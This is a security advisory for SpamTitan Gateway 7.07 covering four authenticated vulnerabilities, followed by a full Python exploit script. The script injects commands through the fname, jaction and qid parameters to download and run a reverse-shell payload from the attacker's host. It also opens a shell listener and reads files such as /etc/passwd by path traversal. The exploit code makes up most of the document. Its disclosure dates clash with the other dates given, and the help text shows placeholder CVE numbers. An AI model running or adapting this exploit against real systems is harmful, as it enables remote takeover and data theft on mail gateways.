471 lines
No EOL
16 KiB
Python
Executable file
471 lines
No EOL
16 KiB
Python
Executable file
# Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated)
|
|
# Date: 2020-09-18
|
|
# Exploit Author: Felipe Molina (@felmoltor)
|
|
# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/
|
|
# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway
|
|
# Version: 7.07
|
|
# Tested on: FreeBSD
|
|
# CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804
|
|
|
|
---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code
|
|
Execution]------------------------------
|
|
|
|
SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple
|
|
Authenticated Remote Code Execution
|
|
Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions)
|
|
Vulnerability: Multiple Authenticated Remote Code Execution
|
|
CVSSv3: 8.7
|
|
(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)
|
|
Severity: High
|
|
Release Date: 2020-09-18
|
|
CVEs: CVE-2020-11699, CVE-2020-11700, CVE-2020-11803,
|
|
CVE-2020-11804
|
|
|
|
|
|
I. Background
|
|
~~~~~~~~~~~~~
|
|
|
|
From www.spamtitan.com:
|
|
|
|
"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
|
|
administrators with extensive tools to control mail flow and protect against
|
|
unwanted email and malware."
|
|
|
|
|
|
II. Description
|
|
~~~~~~~~~~~~~~~
|
|
|
|
Multiple authenticated remote code execution (RCE) vulnerabilities were found
|
|
on the SpamTitan Gateway 7.07 and probably in pervious versions:
|
|
|
|
* CVE-2020-11699: Improper validation of the parameter fname on the page
|
|
certs-x.php would allow an attacker to execute remote code on the
|
|
target server. The user has to be authenticated before interacting with
|
|
this page.
|
|
* CVE-2020-11700: Improper sanitization of the parameter fname, used on the page
|
|
certs-x.php, would allow an attacker to retrieve the contents of
|
|
arbitrary files. The user has to be
|
|
authenticated before interacting with this page.
|
|
* CVE-2020-11803: Improper sanitization of the parameter jaction when
|
|
interacting with
|
|
the page mailqueue.php could lead to PHP code evaluation server-side,
|
|
because the user-provided input is passed directly to the php eval()
|
|
function. The user has to be authenticated on the web platform before
|
|
interacting with the page.
|
|
* CVE-2020-11804: Due to improper sanitization of the parameter qid,
|
|
used in the page
|
|
mailqueue.php, code injection can occur. The input for this
|
|
parameter is provided directly by an authenticated user via an HTTP GET
|
|
request.
|
|
|
|
|
|
III. PoC
|
|
~~~~~~~~
|
|
|
|
Use python 3 and install the following modules before executing: requests.
|
|
|
|
If your IP is 192.168.1.5 and the target SpamTitan server is
|
|
spamtitan.example.com, call the PoC like this:
|
|
./multirce.py -t spamtitan.example.com -i 192.168.1.5 -m <EXPLOIT
|
|
NUMBER> -u <USER> -p <PASSWORD> -U http://192.168.1.5/rev.py
|
|
|
|
---------------------------------------------
|
|
|
|
#!/usr/bin/env python
|
|
|
|
# Author: Felipe Molina (@felmoltor)
|
|
# Date: 09/04/2020
|
|
# Python Version: 3.7
|
|
# Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read
|
|
# 0days on SpamTitan 7.07 and previous versions.
|
|
# Product URL: https://www.spamtitan.com/
|
|
# Product Version: 7.07 and probably previous
|
|
|
|
import requests
|
|
from requests import Timeout
|
|
requests.packages.urllib3.disable_warnings()
|
|
import os
|
|
import threading
|
|
from optparse import OptionParser
|
|
import socket
|
|
import json
|
|
import re
|
|
from urllib.parse import urlparse
|
|
from time import sleep
|
|
from base64 import b64decode,b64encode
|
|
|
|
def myip():
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
try:
|
|
# doesn't even have to be reachable
|
|
s.connect(('10.255.255.255', 1))
|
|
IP = s.getsockname()[0]
|
|
except:
|
|
IP = '127.0.0.1'
|
|
finally:
|
|
s.close()
|
|
return IP
|
|
|
|
def shellServer(ip,port,quiet):
|
|
servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
servers.bind((ip, port))
|
|
servers.listen(1)
|
|
info("Waiting for incoming connection on %s:%s" % (ip,port))
|
|
conn, addr = servers.accept()
|
|
conn.settimeout(1)
|
|
success("Hurray, we got a connection from %s" % addr[0])
|
|
|
|
prompt =conn.recv(128)
|
|
prompt=str(prompt.decode("utf-8")).strip()
|
|
command = input(prompt)
|
|
|
|
while True:
|
|
try:
|
|
c = "%s\n" % (command)
|
|
if (len(c)>0):
|
|
conn.sendall(c.encode("utf-8"))
|
|
# Quit the console
|
|
if command == 'exit':
|
|
info("\nClosing connection")
|
|
conn.close()
|
|
break
|
|
else:
|
|
completeanswer=""
|
|
while True:
|
|
answer=None
|
|
try:
|
|
answer=str((conn.recv(1024)).decode("utf-8"))
|
|
completeanswer+=answer
|
|
except socket.timeout:
|
|
completeanswer.strip()
|
|
break
|
|
print(completeanswer,end='')
|
|
command = input("")
|
|
except (KeyboardInterrupt, EOFError):
|
|
info("\nClosing connection")
|
|
break
|
|
|
|
# This is an authenticated remote code execution in "certs-x.php". E.g:
|
|
def CVE_2020_11699(cookies, target, shellurl):
|
|
# Giving time to the maim thread to open the reverse shell listener
|
|
sleep(5)
|
|
oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
|
|
/tmp/r.py" % (shellurl)
|
|
t1 = "%s/certs.php" % target
|
|
t2 = "%s/certs-x.php" % target
|
|
# get the csrf token value
|
|
res1 = requests.get(t1,cookies=cookies,verify=False)
|
|
m = re.search("var csrf_token_postdata
|
|
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
|
|
if (m is not None):
|
|
csrfguard=m.group(1)
|
|
csrftoken=m.group(2)
|
|
data = {
|
|
"CSRFName":csrfguard,
|
|
"CSRFToken":csrftoken,
|
|
"jaction":"deletecert",
|
|
"fname":"dummy || $(%s)" % oscmd
|
|
}
|
|
info("Triggering the reverse shell in the target.")
|
|
try:
|
|
res2 = requests.post(t2,data=data,cookies=cookies,verify=False)
|
|
print(res2.text)
|
|
except Timeout:
|
|
info("Request timed-out. You should have received already
|
|
your reverse shell.")
|
|
else:
|
|
fail("CSRF tokens were not found. POST will fail.")
|
|
|
|
# This is an arbitrary file read on "certs-x.php"
|
|
def CVE_2020_11700(cookies,target,file):
|
|
fullpath="../../../..%s" % file
|
|
|
|
t1 = "%s/certs.php" % target
|
|
t2 = "%s/certs-x.php" % target
|
|
# get the csrf token value
|
|
res1 = requests.get(t1,cookies=cookies,verify=False)
|
|
m = re.search("var csrf_token_postdata
|
|
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
|
|
if (m is not None):
|
|
csrfguard=m.group(1)
|
|
csrftoken=m.group(2)
|
|
data = {
|
|
"CSRFName":csrfguard,
|
|
"CSRFToken":csrftoken,
|
|
"jaction":"downloadkey",
|
|
"fname":fullpath,
|
|
"commonname":"",
|
|
"organization":"",
|
|
"organizationunit":"",
|
|
"city":"",
|
|
"state":"",
|
|
"country":"",
|
|
"csrout":"",
|
|
"pkout":"",
|
|
"importcert":"",
|
|
"importkey":"",
|
|
"importchain":""
|
|
}
|
|
res2 = requests.post(t2,data=data,cookies=cookies,verify=False)
|
|
if (res2.status_code == 200):
|
|
success("Contents of the file %s" % file)
|
|
print(res2.text)
|
|
else:
|
|
fail("Error obtaining the CSRF guard tokens from the page.")
|
|
return False
|
|
|
|
# This is an authenticated RCE abusing PHP eval function in mailqueue.php
|
|
def CVE_2020_11803(cookies, target, shellurl):
|
|
# Giving time to the maim thread to open the reverse shell listener
|
|
sleep(5)
|
|
oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
|
|
/tmp/r.py" % (shellurl)
|
|
b64=(b64encode(oscmd.encode("utf-8"))).decode("utf-8")
|
|
payload="gotopage+a+\";$b=\"%s\";shell_exec(base64_decode(urldecode($b)));die();$b=\""
|
|
% (b64)
|
|
t1 = "%s/certs.php" % target
|
|
t2 = "%s/mailqueue.php" % target
|
|
# get the csrf token value
|
|
res1 = requests.get(t1,cookies=cookies,verify=False)
|
|
m = re.search("var csrf_token_postdata
|
|
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
|
|
if (m is not None):
|
|
csrfguard=m.group(1)
|
|
csrftoken=m.group(2)
|
|
data = {
|
|
"CSRFName":csrfguard,
|
|
"CSRFToken":csrftoken,
|
|
"jaction":payload,
|
|
"activepage":"incoming",
|
|
"incoming_count":"0",
|
|
"active_count":"0",
|
|
"deferred_count":"0",
|
|
"hold_count":"0",
|
|
"corrupt_count":"0",
|
|
"incoming_page":"1",
|
|
"active_page":"1",
|
|
"deferred_page":"1",
|
|
"hold_page":"1",
|
|
"corrupt_page":"1",
|
|
"incomingrfilter":None,
|
|
"incomingfilter":None,
|
|
"incoming_option":"hold",
|
|
"activerfilter":None,
|
|
"activefilter":None,
|
|
"active_option":"hold",
|
|
"deferredrfilter":None,
|
|
"deferredfilter":None,
|
|
"deferred_option":"hold",
|
|
"holdrfilter":None,
|
|
"holdfilter":None,
|
|
"hold_option":"release",
|
|
"corruptrfilter":None,
|
|
"corruptfilter":None,
|
|
"corrupt_option":"delete"
|
|
}
|
|
# We have to pass a string instead of a dict if we don't want
|
|
the requests library to convert it to
|
|
# an urlencoded data and break our payload
|
|
datastr=""
|
|
cont=0
|
|
for k,v in data.items():
|
|
datastr+="%s=%s" % (k,v)
|
|
cont+=1
|
|
if (cont<len(data)):
|
|
datastr+="&"
|
|
headers={
|
|
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; rv:68.0)
|
|
Gecko/20100101 Firefox/68.0",
|
|
"Accept":
|
|
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
|
|
"Content-Type": "application/x-www-form-urlencoded"
|
|
}
|
|
try:
|
|
res2 =
|
|
requests.post(t2,data=datastr,cookies=cookies,headers=headers,verify=False,proxies=proxies)
|
|
except Timeout:
|
|
info("Request timed-out. You should have received already
|
|
your reverse shell.")
|
|
else:
|
|
fail("CSRF tokens were not found. POST will fail.")
|
|
|
|
# This is an authenticated RCE abusing qid GET parameter in mailqueue.php
|
|
def CVE_2020_11804(cookies, target, shellurl):
|
|
# Giving time to the maim thread to open the reverse shell listener
|
|
sleep(5)
|
|
oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
|
|
/tmp/r.py" % (shellurl)
|
|
payload="1;`%s`" % oscmd
|
|
t = "%s/mailqueue.php?qid=%s" % (target,payload)
|
|
info("Triggering the reverse shell in the target.")
|
|
try:
|
|
res2 = requests.get(t,cookies=cookies,verify=False)
|
|
except Timeout:
|
|
info("Request timed-out. You should have received already your
|
|
reverse shell.")
|
|
|
|
# Authenticate to the web platform and get the cookies
|
|
def authenticate(target,user,password):
|
|
loginurl="%s/login.php" % target
|
|
data={
|
|
"jaction":"none",
|
|
"language":"en_US",
|
|
"address":"%s" % user,
|
|
"passwd":"%s" % password
|
|
}
|
|
res = requests.post(loginurl, data=data,allow_redirects =
|
|
False,verify=False)
|
|
if (res.status_code == 302 and len(res.cookies.items())>0):
|
|
return res.cookies
|
|
else:
|
|
return None
|
|
|
|
def printmsg(msg,quiet=False,msgtype="i"):
|
|
if (not quiet):
|
|
if (success):
|
|
print("[%s] %s" % (msgtype,msg))
|
|
else:
|
|
print("[-] %s" % msg)
|
|
|
|
def info(msg,quiet=False):
|
|
printmsg(msg,quiet,msgtype="i")
|
|
|
|
def success(msg,quiet=False):
|
|
printmsg(msg,quiet,msgtype="+")
|
|
|
|
def fail(msg,quiet=False):
|
|
printmsg(msg,quiet,msgtype="-")
|
|
|
|
def parseoptions():
|
|
parser = OptionParser()
|
|
parser.add_option("-t", "--target", dest="target",
|
|
help="Target SpamTitan URL to attack. E.g.:
|
|
https://spamtitan.com/", default=None)
|
|
parser.add_option("-m", "--method", dest="method",
|
|
help="Exploit number: (1) CVE-2020-11699 [RCE],
|
|
(2) CVE-2020-XXXX [RCE], (3) CVE-2020-XXXX2 [RCE], (4) CVE-2020-11700
|
|
[File Read]", default=1)
|
|
parser.add_option("-u", "--user", dest="user",
|
|
help="Username to authenticate with. Default:
|
|
admin", default="admin")
|
|
parser.add_option("-p", "--password", dest="password",
|
|
help="Password to authenticate with. Default:
|
|
hiadmin", default="hiadmin")
|
|
parser.add_option("-I", "--ip", dest="ip",
|
|
help="Local IP where to listen for the reverse
|
|
shell. Default: %s" % myip(), default=myip())
|
|
parser.add_option("-P", "--port", dest="port",
|
|
help="Local Port where to listen for the reverse
|
|
shell. Default: 4242", default=4242)
|
|
parser.add_option("-U", "--URL", dest="shellurl",
|
|
help="HTTP URL path where the reverse shell is
|
|
located. Default: http://%s/rev.py" % myip(),
|
|
default="http://%s/rev.py" % myip())
|
|
parser.add_option("-f", "--filetoread", dest="filtetoread",
|
|
help="Full path of the file to read from the
|
|
remote server when executing CVE-2020-11700. Default: /etc/passwd",
|
|
default="/etc/passwd")
|
|
parser.add_option("-q", "--quiet",
|
|
action="store_true", dest="quiet", default=False,
|
|
help="Shut up script! Just give me the shell.")
|
|
|
|
return parser.parse_args()
|
|
|
|
def main():
|
|
(options,arguments) = parseoptions()
|
|
quiet = options.quiet
|
|
target = options.target
|
|
ip = options.ip
|
|
port = options.port
|
|
user = options.user
|
|
password = options.password
|
|
shellurl = options.shellurl
|
|
method = int(options.method)
|
|
rfile = options.filtetoread
|
|
|
|
# Sanitize options
|
|
if (target is None):
|
|
fail("Error. Specify a target (-t).")
|
|
exit(1)
|
|
else:
|
|
if (not target.startswith("http://") and not
|
|
target.startswith("https://")):
|
|
target = "http://%s" % target
|
|
|
|
if (method < 1 or method > 4):
|
|
fail("Error. Specify a method from 1 to 4:\n (1)
|
|
CVE-2020-11699 [RCE]\n (2) CVE-2020-XXXX [RCE]\n (3) CVE-2020-XXXX2
|
|
[RCE]\n (4) CVE-2020-11700 [File Read]")
|
|
exit(1)
|
|
|
|
# Before doing anything, login
|
|
cookies = authenticate(target,user,password)
|
|
if (cookies is not None):
|
|
success("User logged in successfully.")
|
|
if (method == 1):
|
|
info("Exploiting CVE-2020-11699 to get a reverse shell on
|
|
%s:%s" % (ip,port),quiet)
|
|
rev_thread = threading.Thread(target=CVE_2020_11699,
|
|
args=(cookies,target,shellurl))
|
|
rev_thread.start()
|
|
# Open the reverse shell listener in this main thread
|
|
info("Spawning a reverse shell listener. Wait for it...")
|
|
shellServer(options.ip,int(options.port),options.quiet)
|
|
elif (method == 2):
|
|
info("Exploiting CVE-2020-11803 to get a reverse shell on
|
|
%s:%s" % (ip,port),quiet)
|
|
rev_thread = threading.Thread(target=CVE_2020_11803,
|
|
args=(cookies,target,shellurl))
|
|
rev_thread.start()
|
|
# Open the reverse shell listener in this main thread
|
|
info("Spawning a reverse shell listener. Wait for it...")
|
|
shellServer(options.ip,int(options.port),options.quiet)
|
|
elif (method == 3):
|
|
info("Exploiting CVE-2020-11804 to get a reverse shell on
|
|
%s:%s" % (ip,port),quiet)
|
|
rev_thread = threading.Thread(target=CVE_2020_11804,
|
|
args=(cookies,target,shellurl))
|
|
rev_thread.start()
|
|
# Open the reverse shell listener in this main thread
|
|
info("Spawning a reverse shell listener. Wait for it...")
|
|
shellServer(options.ip,int(options.port),options.quiet)
|
|
elif (method == 4):
|
|
info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet)
|
|
CVE_2020_11700(cookies,target,rfile)
|
|
else:
|
|
fail("Error authenticating. Are you providing valid credentials?")
|
|
exit(2)
|
|
|
|
exit(0)
|
|
|
|
main()
|
|
|
|
---------------------------------------------
|
|
|
|
III. Impact
|
|
~~~~~~~~~~~
|
|
|
|
Loss of confidentiality, integrity and availability of several files in the
|
|
target server, as well as loss of availability of several services running
|
|
in the SpamTitan.
|
|
Confidentiality of critical system files, such as /etc/passwd or /etc/pwd.db
|
|
would be highly impacted.
|
|
|
|
IV. Disclosure
|
|
~~~~~~~~~~~~~~
|
|
|
|
Reported By: Felipe Molina de la Torre
|
|
Vendor Informed: 2020-04-17
|
|
Patch Release Date: 2019-05-26
|
|
Advisory Release Date: 2019-09-18
|
|
|
|
V. References
|
|
~~~~~~~~~~~~~
|
|
* https://sensepost.com/blog/2020/clash-of-the-spamtitan/
|
|
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11699
|
|
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11700
|
|
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11803
|
|
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11804
|
|
|
|
---------------------------------[SPUK-2020-09/SpamTitan 7.07 Multiple
|
|
Authenticated Remote Code Execution]--- |